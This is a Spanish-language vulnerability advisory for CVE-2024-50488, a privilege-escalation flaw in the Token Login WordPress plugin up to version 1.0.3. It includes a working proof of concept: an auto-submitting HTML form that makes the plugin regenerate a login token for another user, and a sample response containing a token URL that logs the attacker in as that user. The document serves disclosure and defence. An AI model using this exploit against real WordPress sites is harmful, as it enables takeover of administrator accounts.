
Token Login <= 1.0.3 - Escalada de privilegios autenticada (Suscriptor+)
Token Login <= 1.0.3 - Escalada de privilegios autenticada (Suscriptor+)
El complemento Auto Login using a secure tokenized url. Role wise login restriction. para WordPress es vulnerable a la escalada de privilegios mediante la apropiación de cuentas en todas las versiones hasta, e incluyendo, la 1.0.3. Esto se debe a que el complemento no verifica correctamente si un usuario tiene permisos para generar un token de inicio de sesión para otros usuarios. Esto hace posible que atacantes autenticados, con acceso de nivel suscriptor y superior, inicien sesión como otros usuarios, incluidos los administradores.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login
Con la sesión iniciada, ejecuta este HTML submit. Cambia la URL al sitio de WordPress en el que has iniciado sesión. Cambia el ID al usuario para el que quieres generar el token. Copia la URL y podrás iniciar sesión como ese usuario.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Respuesta
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}